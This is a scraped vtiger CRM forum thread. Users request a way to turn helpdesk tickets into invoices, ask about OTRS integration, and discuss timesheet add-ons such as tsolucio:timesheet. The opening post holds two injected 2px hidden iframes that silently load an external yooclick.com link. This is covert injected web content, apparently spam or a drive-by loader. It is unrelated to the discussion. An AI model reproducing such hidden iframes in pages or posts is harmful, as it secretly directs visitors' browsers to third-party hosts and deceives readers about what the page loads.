Helpdesk ticket to Invoice

I would like to be able to create an invoice straight from a helpdesk ticket. I have never been able to use mail merge reliably, because I do not use IE. I like how invoices can be created from quotes and it would be nice to be able to do the same with tickets. <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

  • when creating an invoice from a ticket, users would not need to change modules and all the information would not need to be duplicated. the invoice could show everything on the ticket.
  • dear heath buck,

    thanks for your suggestions. we will take up this feature if the community wishes the same.
    for reference we have created a ticket for this in trac ==> <!-- m --><a class="postlink" href="http://vtiger.fosslabs.com/cgi-bin/trac.cgi/ticket/1413">http://vtiger.fosslabs.com/cgi-bin/trac.cgi/ticket/1413</a><!-- m -->

    thanks & regards

  • i am glad someone else needs this too.
  • don't know if this is the right place, otherwise i will open a new thread for this question...
    but at the moment, we are using otrs for the helpdesk ticketing system at my company for a couple of years now, and it works just the way we want, is it possible to integrate otrs into vtiger5 in some sort of way, replacing the helpdesksystem that is available in vtiger5, and even maybe having a box on the dashboard, with the current open tickets you got in otrs? this would seem like a really cool option for me and the company i'm working for...we just finished integrating otrs with joomla also, so if this could work with vtiger5 also...this would really be appriciated..
  • yes it would be a great feature to be able to go from a ticket to invoice.
  • hi,

    doesn't anybody use vtigerforge <!-- s:-) --><img src="{smilies_path}/icon_smile.gif" alt=":-)" title="smile" /><!-- s:-) -->

    take a look at the tsolucio:tttimecards project and help out there.

    regards, joe.

  • we are looking at integrating timsheet.php ( <!-- w --><a class="postlink" href="http://www.advacen.com/timsheet">www.advacen.com/timsheet</a><!-- w -->). this is a very nice timesheet program that someone has looked at to inetgrate with sugar already.

    some of the features are as follows;

    * user, client, project, and task management
    * calendar view of work, grouped by project or all projects
    * monthly, weekly or daily views of work
    * the ability to customise look and feel
    * work periods spanning multiple days
    * automatic calculation of invoices
    * manual clock-on/clock-off maintenance
    * administrator views and reporting
    * timezone adjustment for use on international shared servers
    * simple weekly timesheet entry mode
    * ldap support

    our thoughts are to integrate this with the helpdesk in vtiger so that a user can apply trouble tickets to their timesheet. this program also has reporting and invoicing capability that we will look to integrate with vtiger invoicing. the projects and task capability would also have to be integrated with vtiger tasks. last but not least we would look to add contract support/management to this.

  • hi jay,

    the tsolucio:tttmecards module is working, it permits conversion of trouble tickets to invoice (via so).
    we have started the tsolucio:tsproject module which is much more complete than phptimesheet's project control which is very basic and has nothing to do with programs like dotproject.

    before we started with the project module we analysed phptimesheet and found that the only thing that vtiger crm was missing was the stop-watch, timesheet control and ldap.

    have you looked into phptimesheet? what do you think? are we missing out on something?

    regards, joe

  • hi,

    tsolucio has just released the first version of tsolucio:timesheet for vtigercrm 5.0.1 and 5.0.2.

    this is based on timesheet.php.

    any comments (and donations) are welcome.

    regards, joe
